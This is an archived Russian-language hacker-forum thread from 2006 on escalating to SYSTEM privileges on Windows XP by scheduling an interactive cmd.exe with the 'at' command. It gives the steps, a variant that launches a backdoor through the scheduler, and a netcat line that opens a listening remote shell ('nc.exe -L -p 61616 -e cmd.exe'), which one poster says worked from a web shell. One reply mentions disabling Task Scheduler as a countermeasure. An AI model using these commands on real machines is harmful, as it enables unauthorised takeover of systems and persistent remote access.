PDA

Просмотр полной версии : получение системных привилегий под вин без сторонних утилит


blackybr
31.10.2006, 21:14
Веселая довольно-таки фишка.
http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc-1/xp_priv_esc.html
не знал про это честно..

что делает чел..

заходит под левым акком. дальше cmd.exe
C:/folder/>at 20:22 /interactive "cmd.exe"
т.е. он ставим задачу на открытие цмд через минуту...

проходит минута.. открываается ком. строка... но! уже с системными привилегиями!! =)))
челу ничего не остается как.. убить свой explorer.exe.. и загрузить через ту где привилегии новый.. вот и все.. проще простого..

бред-небред но все же )

PS работает не от геста, а от простого непревилегированного юзера.+ самого админа естесно win xp he sp2 + full patched.. джае если послденее то system вроде как выше чем обычный админ..

m0le[x]
31.10.2006, 21:44
Прикольно) тоже не знал...

bul.666
31.10.2006, 22:03
Не знал... Хмммммм =)

TaNkist
01.11.2006, 12:08
Под ограниченной учетной записью не пашет.

Ch3ck
01.11.2006, 12:49
А... я вот пробовал. И не раз. А так вещица, то занимательная...

banall
02.11.2006, 05:40
Если допустим есть веб-шелл, можно ли на удаленной машине так же запускать бакдооры с правами системы?

guest3297
02.11.2006, 05:43
C:/folder/>at 20:22 /interactive "cmd.exe backdoor.exe"

TaNkist
02.11.2006, 09:58
Если допустим есть веб-шелл, можно ли на удаленной машине так же запускать бакдооры с правами системы?
Если у тебя есть права админа, то да. Если же веб-сервер запушен под ограниченной учетной записью, то скорее всего нет

Deem3n®
02.11.2006, 10:22
Если вырубить сервис Task Scheduler - работать не будет.

blackybr
02.11.2006, 14:32
Если вырубить сервис Task Scheduler - работать не будет.

вырубить этот сервис - чисто параноя ) можно еще все порты закрыть на всякий случай )

guest3297
02.11.2006, 14:37
C:/folder/>at 20:22 /interactive "cmd.exe c:/system32/nc.exe -L -p 61616 -e cmd.exe"
У меня на 1 тачке прокатило с web шела.